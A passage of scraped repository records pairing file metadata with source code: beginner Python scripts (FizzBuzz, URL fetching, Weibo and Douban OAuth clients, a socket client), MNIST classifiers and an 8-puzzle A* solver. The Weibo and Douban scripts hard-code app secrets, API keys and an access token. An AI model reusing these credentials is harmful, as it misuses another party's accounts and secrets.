= ''\n# if str(a) in str(d):\n# return 'Fizz'\n# for x in dic:\n# answer = answer + dic[x][d%x*5:]\n# if not answer:\n# return d\n# return answer\n\n# if __name__ == '__main__':\n# # a = int(raw_input('input u a: '))\n# # b = int(raw_input('input u b: '))\n# # c = int(raw_input('input u c: '))\n# a,b,c=3,5,7\n# dic = {a: 'Fizz', b: 'Buzz', c: 'Whizz'}\n# for x in xrange(1, 101):\n# print check(a, dic, x)\n\na=[str(i).find('3') > -1 and 'Fizz' or 'Fizz'[i % 3 * 4 : ] + 'Buzz'[i % 5 * 4 : ] + 'Whizz'[i % 7 * 5 : ] or i for i in range(1, 101)]\nprint a\nb=['Fizz'[(str(3)not in str(i))*4:]or 'Fizz'[i % 3 * 4 : ] + 'Buzz'[i % 5 * 4 : ] + 'Whizz'[i % 7 * 5 : ] or i for i in range(1,101)]\nprint b" }, { "alpha_fraction": 0.6961206793785095, "alphanum_fraction": 0.7306034564971924, "avg_line_length": 24.77777862548828, "blob_id": "76be33c762d79eeb94106aa0461d0f91af88c20b", "content_id": "29bffe775d533ebd164fbef71b0154ab8ebf492e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 464, "license_type": "no_license", "max_line_length": 71, "num_lines": 18, "path": "/win32.py", "repo_name": "handelxh/python", "src_encoding": "UTF-8", "text": "# doding:utf-8\n# import win32api\n# import win32con\n# print help(win32api)\n# win32api.MessageBox(win32con.NULL, 'hello', 'python', win32con.MB_OK)\nimport chardet\nimport urllib2\nimport re\n# print help(chardet)\n# print chardet.detect(response)['encoding']\nresponse=urllib2.urlopen('http://baidu.com')\n# print response.read()\nresponse=response.read()\n# response=str(response)\nprint response\nha=re.findall('[a-zA-z]+://[^\\s]*/',response)\nprint ha[0]\n# print ha.group()\n" }, { "alpha_fraction": 0.685230016708374, "alphanum_fraction": 0.7615011930465698, "avg_line_length": 40.349998474121094, "blob_id": "abd2f463d89836f8280f9f9f925757164f1b374c", "content_id": "0a2861b31662752cb91ad56df5f1d96a13f04b40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 826, "license_type": "no_license", "max_line_length": 113, "num_lines": 20, "path": "/sinaweibo.py", "repo_name": "handelxh/python", "src_encoding": "UTF-8", "text": "from weibo import APIClient\n# import urllib2\nimport requests\nAPP_KEY = '4064761638' # app key\nAPP_SECRET = '37cd063f3dfa97746ead2385796f90f1' # app secret\n# CALLBACK_URL = 'http://www.baidu.com' # callback url\nCALLBACK_URL = 'http://www.baidu.com'\nclient = APIClient(app_key=APP_KEY, app_secret=APP_SECRET, redirect_uri=CALLBACK_URL)\nurl = client.get_authorize_url()\n# print url\ncode = '17a3c16013c041d4c64361998cf7e9c9'\n# code=raw_input('put the url to your browers,then get the code=')\nr = client.request_access_token(code)\naccess_token = r.access_token\nprint access_token\nexpires_in = r.expires_in \nprint expires_in\nclient.set_access_token(access_token, expires_in)\n# print client.statuses.user_timeline.get()\n# print client.statuses.update.post(status=u'test OAuth 2.0 send weibo to fuck the rip city, by LXH AT 2014/5/3')" }, { "alpha_fraction": 0.5384615659713745, "alphanum_fraction": 0.5961538553237915, "avg_line_length": 12, "blob_id": "dcf09994163e5b15824b3f7e8c6a98fead25afbc", "content_id": "b246116e8bf53518632f17bc7bed47199428a980", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 52, "license_type": "no_license", "max_line_length": 35, "num_lines": 4, "path": "/scapy-master/README.md", "repo_name": "handelxh/python", "src_encoding": "UTF-8", "text": "Scapy\n========\n\nA clone of the Scapy 2.2.0 release.\n" }, { "alpha_fraction": 0.7101449370384216, "alphanum_fraction": 0.759834349155426, "avg_line_length": 36.230770111083984, "blob_id": "7eb3f312407fe64f63a677b6ea8409b74a137a72", "content_id": "ba6264e8a7f0f0ce5168a9ea197ade167253c637", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 483, "license_type": "no_license", "max_line_length": 68, "num_lines": 13, "path": "/scapy.py", "repo_name": "handelxh/python", "src_encoding": "UTF-8", "text": "from douban_client import DoubanClient\nimport requests\nAPI_KEY = '01674b2cf3fb7e9d0435e186dbf27bd7'\nAPI_SECRET = '5fc3e181565091c7'\nSCOPE = 'douban_basic_common,shuo_basic_r,shuo_basic_w'\nyour_redirect_uri = 'http://bbs.csdn.net/topics/370247707.com'\nclient = DoubanClient(API_KEY, API_SECRET, your_redirect_uri, SCOPE)\n# print 'Go to the following link in your browser:'\nprint client.authorize_url\nr = requests.post(client.authorize_url)\ncode = r.json()['code']\nclient.auth_with_code(110)\nprint client.user.me" }, { "alpha_fraction": 0.7018072009086609, "alphanum_fraction": 0.7108433842658997, "avg_line_length": 19.6875, "blob_id": "18f6a2fbd9ee307cdc8bc202e1447bb5efc2bb9d", "content_id": "4f476214087387145ed848e2b5b9d732294997ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 332, "license_type": "no_license", "max_line_length": 58, "num_lines": 16, "path": "/chat/chat.py", "repo_name": "handelxh/python", "src_encoding": "UTF-8", "text": "\nimport urllib2\nimport urllib\nimport json\nimport pprint\nurl='http://api.ajaxsns.com/api.php?key=free&appid=0&msg='\nwhile True:\n\t# strs=raw_input('u say:')\n\n\tstrs='baidu.com'\n\tif strs=='fuck':\n\t\tbreak\n\telse:\n\t\turls=url+strs\n\t\tresponse=urllib2.urlopen(urls)\n\t\tresponse=json.loads(response.read())\n\t\tprint 'he say',response['content']\n" }, { "alpha_fraction": 0.6172839403152466, "alphanum_fraction": 0.6882715821266174, "avg_line_length": 16.052631378173828, "blob_id": "37cc084ae43d79341a4e5481dc4eaab686d6c76e", "content_id": "791e764ca612265b10926ad850c728e7f61e9d36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 324, "license_type": "no_license", "max_line_length": 32, "num_lines": 19, "path": "/socket/client.py", "repo_name": "handelxh/python", "src_encoding": "UTF-8", "text": "import socket\nimport os\nsock = socket.socket()\nsock.connect(('220.181.111.85',80))\nimport time\ntime.sleep(2)\nstrs=raw_input('input:')\nsock.send(strs)\n# time.sleep(2)\nprint sock.recv(1024)\n# strs=raw_input('please input')\n# sock.send(strs)\n# time.sleep(5)\n\n# sock.send('4')\n# print sock.recv(1024)\n# time.sleep(2)\n\nsock.close()\n" }, { "alpha_fraction": 0.6466431021690369, "alphanum_fraction": 0.729093074798584, "avg_line_length": 39.380950927734375, "blob_id": "f2f4f1a560a047438a96fd78f4f2027fb9bde993", "content_id": "87d3d1af4afd816c489bd9fbff6f8ece745e723b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 849, "license_type": "no_license", "max_line_length": 113, "num_lines": 21, "path": "/sinaweibo1.py", "repo_name": "handelxh/python", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\nfrom weibo import APIClient\nAPP_KEY = '4064761638' # app key\nAPP_SECRET = '37cd063f3dfa97746ead2385796f90f1' # app secret\n# CALLBACK_URL = 'http://www.baidu.com' # callback url\nCALLBACK_URL = 'http://www.baidu.com'\nclient = APIClient(app_key=APP_KEY, app_secret=APP_SECRET, redirect_uri=CALLBACK_URL)\naccess_token = '2.00SrYGlBaL1F8Eb7677005a1UoPQ2E'\n# print access_token\nexpires_in = '1556811461' \n# print expires_in\nclient.set_access_token(access_token, expires_in)\n# print client.statuses.user_timeline.get()\n# print client.statuses.update.post(status=u'test OAuth 2.0 send weibo to fuck the rip city, by LXH AT 2014/5/3')\nimport requests\nimport json\npram={'source':'4064761638','access_token':'2.00SrYGlBaL1F8Eb7677005a1UoPQ2E','ip':'124.207.38.202'}\nr=requests.get('https://api.weibo.com/2/location/geo/ip_to_geo.json',params=pram)\nr=r.json()\nimport pprint \npprint.pprint(r)\n\n" } ]
13
Yoon5/OpenCV_in_Ubuntu
https://github.com/Yoon5/OpenCV_in_Ubuntu
db6fbb9799dd647b99735dceb249cbb2166ac92c
ded2f25cd849f271b5de2d9b69a0815767f665b7
f26493c81460d154a1fe30ed3205b81975e9abba
refs/heads/master
2020-12-16T22:40:04.893829
2019-12-27T07:23:27
2019-12-27T07:23:27
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8283582329750061, "alphanum_fraction": 0.8283582329750061, "avg_line_length": 43.66666793823242, "blob_id": "5e104b4894169bc9b2ea45a929d42a04ae4093db", "content_id": "d9dcac2c9bcd29eef4afec561918529e2ecad4a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 134, "license_type": "no_license", "max_line_length": 101, "num_lines": 3, "path": "/4day_course/Python/00_OpenCV_TEST_SINGLE.py", "repo_name": "Yoon5/OpenCV_in_Ubuntu", "src_encoding": "UTF-8", "text": "from OpenCV_Functions import *\n\nprocessingSingleImage(\"/home/opencv/OpenCV_in_Ubuntu/Data/Lane_Detection_Images/solidWhiteCurve.jpg\")\n" } ]
1
tsurrdurr/MNIST-classification
https://github.com/tsurrdurr/MNIST-classification
46fe94eeb83cb05411f6f5b6936dd89a96d45707
3623dab73308c549c172afdafd01bdf4c619fb6c
c50e518992caf6a92fdc53f1e217d358f66a1344
refs/heads/master
2021-01-20T18:04:30.346891
2017-05-22T23:05:09
2017-05-22T23:05:09
90,903,073
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5, "alphanum_fraction": 0.5127156972885132, "avg_line_length": 30.47142791748047, "blob_id": "b1e7f1c8f608f713dabccdf8c46c4463c6cc1d45", "content_id": "873e5bf6ffaf4d1b2e07b53c37574087329f4035", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2202, "license_type": "no_license", "max_line_length": 76, "num_lines": 70, "path": "/read_data.py", "repo_name": "tsurrdurr/MNIST-classification", "src_encoding": "UTF-8", "text": "import fileinput\nimport struct\nfrom sklearn.externals import joblib\nroot = \"YOUR ROOT PATH ENDING WITH SLASH\"\ndef main():\n labels_path = root + \"train-labels-idx1-ubyte.gz\"\n labels = get_labels(labels_path)\n joblib.dump(labels, root + \"labels.joblib.pkl\")\n\n images_path = root + \"train-images-idx3-ubyte.gz\"\n images = get_grayscaled_images(images_path)\n joblib.dump(images, root + \"grayscaled_images_numeric.joblib.pkl\")\n\ndef get_labels(labels_path):\n print(\"Parsing labels...\")\n g = fileinput.FileInput(labels_path, openhook=fileinput.hook_compressed)\n x = g.__next__()\n head = []\n for i in range(2):\n head.append(struct.unpack(\">I\", x[4 * i:4 * i + 4])[0])\n magic, n_labels = head\n print(\"magic={}, labels={}\".format(*head))\n\n labels = []\n j = 8 # byte index on current chunk\n while len(labels) < n_labels:\n try:\n val = x[j]\n except IndexError:\n # read a new chunk from file\n x = g.__next__()\n j = 0\n val = x[j]\n labels.append(val)\n j += 1\n return labels\n\ndef get_grayscaled_images(images_path):\n print(\"Parsing images...\")\n f = fileinput.FileInput(images_path, openhook=fileinput.hook_compressed)\n x = f.__next__()\n head = []\n for i in range(4):\n head.append(struct.unpack(\">I\", x[4*i:4*i+4])[0])\n magic, n_images, rows, columns = head\n print(\"magic={}, images={}, rows={}, cols={}\".format(*head))\n j = 16 # index in current chunk\n images = []\n for i in range(n_images):\n img = [[0] * rows for i in range(columns)]\n for r in range(rows):\n for c in range(columns):\n try:\n val = x[j]\n except IndexError:\n # need to read a new chunk of data from file\n x = f.__next__()\n j = 0\n val = x[j]\n if val > 170:\n img[r][c] = 2\n elif val > 85:\n img[r][c] = 1\n else:\n img[r][c] = 0\n j+=1\n images.append(img)\n return images\n\nif __name__ =='__main__':main()" }, { "alpha_fraction": 0.7377777695655823, "alphanum_fraction": 0.742222249507904, "avg_line_length": 31.285715103149414, "blob_id": "44ce244330e70ff40b20551e9bf4519450d4148f", "content_id": "2bfd11c62835951793fcd027ef171135618cd5fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 225, "license_type": "no_license", "max_line_length": 51, "num_lines": 7, "path": "/classifier_kn.py", "repo_name": "tsurrdurr/MNIST-classification", "src_encoding": "UTF-8", "text": "from sklearn.neighbors import KNeighborsClassifier\n\ndef classify(images, labels):\n nbrs = KNeighborsClassifier(n_neighbors=3)\n nbrs.fit(images, labels)\n print(\"Accuracy: \", nbrs.score(images, labels))\n return nbrs" }, { "alpha_fraction": 0.7091836929321289, "alphanum_fraction": 0.7091836929321289, "avg_line_length": 27.14285659790039, "blob_id": "b0823ab65cd3cd52c36599437520e94ecc2a1b62", "content_id": "8b7aaaef088c165c89f7ec27a46c894e7f4f9259", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 196, "license_type": "no_license", "max_line_length": 50, "num_lines": 7, "path": "/classifier_nb.py", "repo_name": "tsurrdurr/MNIST-classification", "src_encoding": "UTF-8", "text": "from sklearn.naive_bayes import MultinomialNB\n\ndef classify(images, labels):\n mnb = MultinomialNB()\n mnb.fit(images, labels)\n print(\"Accuracy: \", mnb.score(images, labels))\n return mnb" }, { "alpha_fraction": 0.7040358781814575, "alphanum_fraction": 0.7085201740264893, "avg_line_length": 31, "blob_id": "9d9a830ab26c73e7ab42acb5a1eb3286e08c7ebf", "content_id": "6f188f0d091c451799885337eed9a0b3d23aaf76", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 223, "license_type": "no_license", "max_line_length": 51, "num_lines": 7, "path": "/classifier_sgd.py", "repo_name": "tsurrdurr/MNIST-classification", "src_encoding": "UTF-8", "text": "from sklearn.linear_model import SGDClassifier\n\ndef classify(images, labels):\n clf = SGDClassifier(loss=\"hinge\", penalty=\"l2\")\n clf.fit(images, labels)\n print(\"Accuracy: \", clf.score(images, labels))\n return clf" }, { "alpha_fraction": 0.7648932933807373, "alphanum_fraction": 0.769034743309021, "avg_line_length": 53.13793182373047, "blob_id": "9b90f75c49740eae9a448908fd70e554e6bf8dba", "content_id": "a9718708f5415842f5efa60c2a152c8aaa6c981b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3141, "license_type": "no_license", "max_line_length": 245, "num_lines": 58, "path": "/readme.md", "repo_name": "tsurrdurr/MNIST-classification", "src_encoding": "UTF-8", "text": "# MNIST-classification\n\nAn attempt in exploring scikit-learn functionality and machine learning algorithms using samples provided by MNIST database.\n\n## Installation\n\nI recomend to use [virtualenv](https://github.com/pypa/virtualenv) and set up a new environment for this project.\n\nPython version used is **Python 3.6**.\n\nLinux installation: \nYou may simply run the following code to install all the dependencies: \n`pip install -r requirements.txt` \n\nWindows installation: \nWith Windows, installation from _requirements.txt_ doesn't quite work out for me, but [this link](http://www.lfd.uci.edu/~gohlke/pythonlibs/) helped me out a lot with Windows wheels. \nDownload the following packages for your system and python 3.6: \n[numpy+mkl](http://www.lfd.uci.edu/~gohlke/pythonlibs/#numpy) \n[scikit-learn](http://www.lfd.uci.edu/~gohlke/pythonlibs/#scikit-learn) \n[scipy](http://www.lfd.uci.edu/~gohlke/pythonlibs/#scipy) \nand install them with: \n`pip install .\\wheel_name.whl`. \n\n## Running\n\nDownload 4 MNIST database files from [here](http://yann.lecun.com/exdb/mnist/) and put them all to a folder where temporary files may be stored. **Do not** extract archives content. \nSet `root` variable in `read_data.py` to folder where you have put the MNIST samples. \nYou would want to run `read_data.py`, then `classification.py` with desired parameter and finally `prediction.py`.\n\n## read_data.py\n\nReads the training data in a format, described [at the bottom of official MNIST page](http://yann.lecun.com/exdb/mnist/). \n\nThe resulting arrays containing images and their labels are saved with scikit-learn tool `joblib` (so you only have to do it once).\n\n## classification.py\n\nCreates a classifier — object capable of determining a class of input data object. \n\nList of `classification.py` parameters: \n`-svc` - use [Linear SVC classifier](http://scikit-learn.org/stable/modules/generated/sklearn.svm.LinearSVC.html) \n`-sgd` - use [SGD classifier](http://scikit-learn.org/stable/modules/generated/sklearn.linear_model.SGDClassifier.html) \n`-nb` - use [Multinomial Naive Bayes classifier](http://scikit-learn.org/stable/modules/naive_bayes.html#multinomial-naive-bayes) \n`-kn` - use [KNeighbors classifier](http://scikit-learn.org/stable/modules/generated/sklearn.neighbors.KNeighborsClassifier.html)\n\nArrays from earlier are read from disk and reshaped with `numpy` tools. Then a classifier of selected type is created based on input images and their classes (0-9). \nAfter this accuracy of the classifier is displayed (percentage of correctly classified values from the training set). \nClassifier is also saved to disk.\n\n\n## prediction.py\n\nTests the generated classifier with test data. \n\nClassifier from earlier read from disk and test values are parsed according to MNIST format description. `predict` function of the classifier returns array of predicted values of test images. Then these predictions are compared to test labels. \n\nFor now ~91.4% of test values are recognized with Linear SVC. \nKNeighbors prediction test result shows 96.5% accuracy, but it takes really much time and disk space to create a classifier." }, { "alpha_fraction": 0.6708860993385315, "alphanum_fraction": 0.6793248653411865, "avg_line_length": 28.75, "blob_id": "63acf53089855ec2068f68959ff58676e30e448b", "content_id": "7e0883b8185a49aa13b03a031742e821b9dc48a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 237, "license_type": "no_license", "max_line_length": 54, "num_lines": 8, "path": "/classifier_svc.py", "repo_name": "tsurrdurr/MNIST-classification", "src_encoding": "UTF-8", "text": "from sklearn import svm\n\ndef classify(images, labels):\n C = 1.0 # SVM regularization parameter\n lin_svc = svm.LinearSVC(C=C)\n lin_svc.fit(images, labels)\n print(\"Accuracy: \", lin_svc.score(images, labels))\n return lin_svc" }, { "alpha_fraction": 0.483582079410553, "alphanum_fraction": 0.7014925479888916, "avg_line_length": 15, "blob_id": "8da08c53e7bc837b131cb515500936f4ee899d23", "content_id": "1bf8d0cafd97cd510182b4cc3c18108b89297a8b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 335, "license_type": "no_license", "max_line_length": 22, "num_lines": 21, "path": "/requirements.txt", "repo_name": "tsurrdurr/MNIST-classification", "src_encoding": "UTF-8", "text": "click==6.7\ncycler==0.10.0\ndecorator==4.0.11\nitsdangerous==0.24\nlinecache2==1.0.0\nMarkupSafe==1.0\nnetworkx==1.11\nnumpy==1.12.1\nolefile==0.44\npbr==3.0.0\nPillow==4.1.1\npyparsing==2.2.0\npython-dateutil==2.6.0\npytz==2017.2\nPyWavelets==0.5.2\nscikit-learn==0.18.1\nscipy==0.19.0\nsix==1.10.0\nstevedore==1.21.0\ntraceback2==1.4.0\nWerkzeug==0.12.1" }, { "alpha_fraction": 0.6189159154891968, "alphanum_fraction": 0.6255530714988708, "avg_line_length": 31.303571701049805, "blob_id": "bcda0c44eb4bc878ede0e77a4ea43f13f6ffa831", "content_id": "b4cd309cee3d4945b6b80b37179af2aa7032dbb0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1808, "license_type": "no_license", "max_line_length": 71, "num_lines": 56, "path": "/classification.py", "repo_name": "tsurrdurr/MNIST-classification", "src_encoding": "UTF-8", "text": "import numpy as np\nimport classifier_svc as SVC\nimport classifier_sgd as SGD\nimport classifier_nb as NB\nimport classifier_kn as KN\nfrom sklearn.externals import joblib\nfrom read_data import root\nimport sys\n\ndef main():\n if sys.argv[1:]:\n argument = sys.argv[1]\n else:\n argument = None\n if(argument == \"-svc\"):\n images, labels = read_data()\n svc_classifier = SVC.classify(images, labels)\n dump_classifier(svc_classifier)\n elif(argument == \"-sgd\"):\n images, labels = read_data()\n sgd_classifier = SGD.classify(images, labels)\n dump_classifier(sgd_classifier)\n elif(argument == \"-nb\"):\n images, labels = read_data()\n nb_classifier = NB.classify(images, labels)\n dump_classifier(nb_classifier)\n elif(argument == \"-kn\"):\n images, labels = read_data()\n kn_classifier = KN.classify(images, labels)\n dump_classifier(kn_classifier)\n elif((argument == \"-h\") | (argument == \"-help\")):\n print_help()\n else:\n print(\"Incorrect argument. Try \\\"-help\\\"\")\n\ndef dump_classifier(classifier):\n filename = root + \"digits_classifier.joblib.pkl\"\n joblib.dump(classifier, filename)\n\n\ndef read_data():\n print(\"Reading data to form a classifier...\")\n images = joblib.load(root + \"grayscaled_images_numeric.joblib.pkl\")\n labels = joblib.load(root + \"labels.joblib.pkl\")\n images = np.asanyarray(images)\n images = images.reshape(60000, -60000)\n print(\"Creating classifier...\")\n return images, labels\n\ndef print_help():\n print(\"Possible arguments: \\\"-svc\\\", \\\"-sgd\\\", \\\"-nb\\\"\")\n print(\"\\\"-svc\\\" - use LinearSVC\")\n print(\"\\\"-sgd\\\" - use SGDClassifier\")\n print(\"\\\"-nb\\\" - use MultinomialNB\")\n print(\"\\\"-nn\\\" - use MultinomialNB\")\nif __name__ =='__main__':main()" }, { "alpha_fraction": 0.6255319118499756, "alphanum_fraction": 0.6521276831626892, "avg_line_length": 26.676469802856445, "blob_id": "242c21556258f6ef6a07a4e26e1f9a35373a3a0f", "content_id": "ed18a44cfbeeb93d153beb0fc30d96454b684585", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 940, "license_type": "no_license", "max_line_length": 64, "num_lines": 34, "path": "/prediction.py", "repo_name": "tsurrdurr/MNIST-classification", "src_encoding": "UTF-8", "text": "import numpy as np\nimport read_data as reader\nfrom sklearn.externals import joblib\nfrom read_data import root\n\ndef normalize(image):\n image = np.asanyarray(image)\n image = image.reshape(10000, -10000)\n return image\n\ndef main():\n test_images_path = root + \"t10k-images-idx3-ubyte.gz\"\n test_labels_path = root + \"t10k-labels-idx1-ubyte.gz\"\n test_labels = reader.get_labels(test_labels_path)\n test_images = reader.get_grayscaled_images(test_images_path)\n\n print(\"Loading classifier...\")\n classifier_path = root + \"digits_classifier.joblib.pkl\"\n classifier = joblib.load(classifier_path)\n\n i = 0\n match = 0\n print(\"Predicting test samples classes...\")\n test_images = normalize(test_images)\n result = classifier.predict(test_images)\n\n while(i < 10000):\n if(result[i] == test_labels[i]):\n match += 1\n i += 1\n\n print(\"Matched: \", match)\n\nif __name__ =='__main__':main()" } ]
9
Hemapriya485/ibm-full-stack-dev-cert
https://github.com/Hemapriya485/ibm-full-stack-dev-cert
55a9a9a9d2cfc8a05dc2687d5d5ef6fcbfd7be9b
2da5a28fbe1293174e9ffc945b0e8ef6b9515103
7ac048d20d28ce93853ea8f2f5222df3c06c4e4a
refs/heads/main
2023-04-11T03:43:23.878491
2021-04-20T16:38:23
2021-04-20T16:38:23
359,877,378
0
0
null
2021-04-20T16:11:45
2021-04-20T16:31:59
2021-04-20T16:38:23
Python
[ { "alpha_fraction": 0.6490066051483154, "alphanum_fraction": 0.6490066051483154, "avg_line_length": 24.16666603088379, "blob_id": "40922f31bbd786802cd339a9299e01e79f0044a8", "content_id": "18b24d237c78b77df5342dd3fb91f144b6bc0bd0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 151, "license_type": "no_license", "max_line_length": 47, "num_lines": 6, "path": "/string_multiplication.py", "repo_name": "Hemapriya485/ibm-full-stack-dev-cert", "src_encoding": "UTF-8", "text": "def str_demo(str_in,n):\n for x in range(n):\n print(str_in)\nstr_in=\"Hello\"\nn=int(input(\"Enter the multiplication factor\"))\nstr_demo(str_in,n)\n" }, { "alpha_fraction": 0.604938268661499, "alphanum_fraction": 0.604938268661499, "avg_line_length": 15.5, "blob_id": "938a72115d4e028b431de25e9f206d0241928e1a", "content_id": "aa5230d4371b4b65ad4a97385b3b6bcac861933e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 243, "license_type": "no_license", "max_line_length": 34, "num_lines": 14, "path": "/Alphabet.py", "repo_name": "Hemapriya485/ibm-full-stack-dev-cert", "src_encoding": "UTF-8", "text": "def main():\r\n pass\r\n\r\nif __name__ == '__main__':\r\n main()\r\nimport string\r\nalpha_letters=[]\r\nalpha_letters=string.ascii_letters\r\nuser_in=input()\r\nprint(user_in)\r\nif(user_in in alpha_letters):\r\n print(\"Alphabet\")\r\nelse:\r\n print(\"No\")" }, { "alpha_fraction": 0.5091210603713989, "alphanum_fraction": 0.5605306625366211, "avg_line_length": 26.409090042114258, "blob_id": "e0c70ac238a6f307ad9bd48426042c8f8cd19459", "content_id": "84701a64546fb816df5b2dcfc8001511e7306041", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 603, "license_type": "no_license", "max_line_length": 59, "num_lines": 22, "path": "/amstrong_num.py", "repo_name": "Hemapriya485/ibm-full-stack-dev-cert", "src_encoding": "UTF-8", "text": "# get a list of amstrong numbers within a given input range\ndef check_amstrong(num1,num2):\n List_of_amstrong=[]\n for x in range(num1+1,num2):\n n=0\n temp1=x\n temp2=x\n while(temp1>0):\n n=n+1\n temp1=int(temp1/10)\n ams=0\n while(temp2>0):\n rem=temp2%10\n ams=ams+(rem**n)\n temp2=int(temp2/10)\n if(ams==x):\n List_of_amstrong.append(x)\n return List_of_amstrong\nnum1=int(input(\"Enter upper limit:\"))\nnum2=int(input(\"Enter lower limit:\"))\nprint(num1,num2)\nprint(check_amstrong(num1,num2))\n" }, { "alpha_fraction": 0.8131579160690308, "alphanum_fraction": 0.8184210658073425, "avg_line_length": 62.33333206176758, "blob_id": "59be4c3396faa1d6b13c3354cee3bc1d0be8623c", "content_id": "03b2d99648cf0642be1a283fefb84a72707ef41d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 380, "license_type": "no_license", "max_line_length": 168, "num_lines": 6, "path": "/README.md", "repo_name": "Hemapriya485/ibm-full-stack-dev-cert", "src_encoding": "UTF-8", "text": "# ibm-full-stack-dev-cert\nRepo for managing projects to be done in IBM Full Stack Cloud Developer Certification course.\n\nIBM Full Stack Cloud Developer Certification course includes a total of 10 courses each providing deep insights to the skills required for a full stack cloud developer.\n\nThis repo provides reference to hands-on projects implemented at the end of each course.\n" } ]
4
rafael-telles/8Puzzle-Solver
https://github.com/rafael-telles/8Puzzle-Solver
c1b93dc520968050220f28fd3d009dafe3661fbe
021bcedac6e4bb5fb953cb40fd1e5db7a8f1be75
027c84ea6c240832ed70c146833e4ab8e13f55c1
refs/heads/master
2020-03-29T20:36:21.185798
2018-09-25T19:46:32
2018-09-25T19:46:32
150,320,492
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5234244465827942, "alphanum_fraction": 0.5365309715270996, "avg_line_length": 27.236221313476562, "blob_id": "2eb0c4752161573d13078aa2467f6af3dae11ad3", "content_id": "400dcc7fab6acb39657e563be37ad81f9fe7ab49", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3586, "license_type": "permissive", "max_line_length": 118, "num_lines": 127, "path": "/8puzzle.py", "repo_name": "rafael-telles/8Puzzle-Solver", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\n\"\"\"\nSimple implementation of A* algorithm to solve 8 Puzzle.\nIt uses the sum of Manhattan distance of each number compared to where it should be in the puzzle as heuristic method.\n\"\"\"\n__author__ = \"Rafael Telles\"\n\n\nclass State(object):\n def __init__(self, s, moves):\n self.s = tuple(s)\n self.moves = moves\n\n def expand(self):\n states = []\n zero_index = self.s.index(0)\n if zero_index >= 3: # can go up\n new_state = list(self.s)\n new_state[zero_index] = new_state[zero_index - 3]\n new_state[zero_index - 3] = 0\n new_moves = self.moves + '^'\n states.append(State(new_state, new_moves))\n if zero_index < 6: # can go down\n new_state = list(self.s)\n new_state[zero_index] = new_state[zero_index + 3]\n new_state[zero_index + 3] = 0\n new_moves = self.moves + 'v'\n states.append(State(new_state, new_moves))\n if zero_index % 3 > 0: # can go left\n new_state = list(self.s)\n new_state[zero_index] = new_state[zero_index - 1]\n new_state[zero_index - 1] = 0\n new_moves = self.moves + '<'\n states.append(State(new_state, new_moves))\n if zero_index % 3 <= 1: # can go right\n new_state = list(self.s)\n new_state[zero_index] = new_state[zero_index + 1]\n new_state[zero_index + 1] = 0\n new_moves = self.moves + '>'\n states.append(State(new_state, new_moves))\n return states\n\n def print(self):\n print(\"|{}|{}|{}|\\n\"\n \"|{}|{}|{}|\\n\"\n \"|{}|{}|{}|\".format(*self.s))\n\n def __hash__(self):\n return hash(self.s)\n\n def __eq__(self, other):\n return self.s == other.s\n\n def __repr__(self):\n return \"State({}), h={}, path={}\".format(self.s, heuristic(self), self.moves)\n\n\ndef heuristic(state):\n h = 0\n for i, n in enumerate(state.s):\n h += abs(int(n / 3) - int(i / 3)) + abs(n % 3 - i % 3)\n return h\n\n\ndef cost(state):\n return heuristic(state) + len(state.moves)\n\n\ndef pop_best(states):\n list_states = list(states)\n list_states.sort(key=cost)\n best_state = list_states[0]\n states.remove(best_state)\n\n return best_state\n\n\n# Algorithm got from https://math.stackexchange.com/questions/293527/how-to-check-if-a-8-puzzle-is-solvable/\ndef check_solvable(state):\n state = list(state)\n state.remove(0)\n\n inversions = 0\n for i in range(len(state)):\n for j in range(i + 1, len(state)):\n if state[j] > state[i]:\n inversions += 1\n\n return inversions % 2 == 0\n\n\ndef solve(states):\n visited = set()\n while True:\n if not states:\n raise Exception(\"Busca falhou!\")\n\n best_state = pop_best(states)\n visited.add(best_state.s)\n\n h = heuristic(best_state)\n if h == 0:\n return best_state\n\n if len(best_state.moves) > 31: # The hardest 8 Puzzle state takes 31 moves.\n continue\n\n new_states = best_state.expand()\n states |= set([s for s in new_states if s.s not in visited])\n\n\nif __name__ == \"__main__\":\n import random\n\n while True:\n state_s = list(range(9))\n random.shuffle(state_s)\n\n if check_solvable(state_s):\n state = State(state_s, \"\")\n state.print()\n print(\"Solving...\")\n solution = solve({state})\n\n print(\"Solved! {} moves: {}\".format(len(solution.moves), solution.moves))\n print()\n" }, { "alpha_fraction": 0.7875000238418579, "alphanum_fraction": 0.7958333492279053, "avg_line_length": 59, "blob_id": "719673445f1135ff5e534defbd71804833a360ec", "content_id": "793c99bb6eb412b139defb79767d2574c1602e01", "detected_licenses": [ 